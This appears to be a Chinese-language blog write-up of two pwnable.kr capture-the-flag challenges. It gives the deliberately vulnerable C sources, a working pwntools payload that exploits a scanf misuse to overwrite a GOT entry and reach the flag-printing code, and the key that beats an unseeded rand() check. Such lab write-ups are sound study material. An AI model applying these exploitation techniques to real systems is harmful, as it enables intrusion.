lpc的pwnable.kr日记(2)

Posted on | Edited on | Comments: | Views:

[passcode]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#include <stdio.h>
#include <stdlib.h>

void login(){
        int passcode1;
        int passcode2;

        printf("enter passcode1 : ");
        scanf("%d", passcode1);
        fflush(stdin);

        // ha! mommy told me that 32bit is vulnerable to bruteforcing :)
        printf("enter passcode2 : ");
        scanf("%d", passcode2);

        printf("checking...\n");
        if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
                exit(0);
        }
}

void welcome(){
        char name[100];
        printf("enter you name : ");
        scanf("%100s", name);
        printf("Welcome %s!\n", name);
}

int main(){
        printf("Toddler's Secure Login System 1.0 beta.\n");

        welcome();
        login();

        // something after login...
        printf("Now I can safely trust you that you have credential :)\n");
        return 0;
}

这道题主要包含两个知识点:

1.scanf不加取地址符的时候,如果后面那个参数不是地址型的参数,那么就从栈中读取4个字节作为scanf取的地址。

2.GOT表覆写。关于GOT表覆写,大佬的这篇文章已经讲得很清楚了:https://blog.csdn.net/smalosnail/article/details/53247502

关于GOT表的知识,见这位dalao的博客:

https://blog.csdn.net/linyt/article/details/51635768

解题思路就是,把GOT表中某个函数的地址写进栈中,以充当scanf的地址,写入的内容是system函数的地址,在该函数运行的时候,调用system函数。

payload:

1
2
passcode@prowl:~$ python -c "from pwn import *;payload = 'A' * 96 + p32(0x0804a000) + str(0x80485e3);print(payload)" | .
/passcode

Toddler’s Secure Login System 1.0 beta.
enter you name : Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
Sorry mom.. I got confused about scanf usage :(
enter passcode1 : Now I can safely trust you that you have credential :)

[random]

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include <stdio.h>

int main(){
	unsigned int random;
	random = rand();	// random value!

	unsigned int key=0;
	scanf("%d", &key);

	if( (key ^ random) == 0xdeadbeef ){
		printf("Good!\n");
		system("/bin/cat flag");
		return 0;
	}

	printf("Wrong, maybe you should try 2^32 cases.\n");
	return 0;
}

解题关键:利用伪随机数rand()初始化时不设种子,每次都是同一个值的特点。

random@prowl:~$ ./random
3039230856
Good!
Mommy, I thought libc random is unpredictable…

0%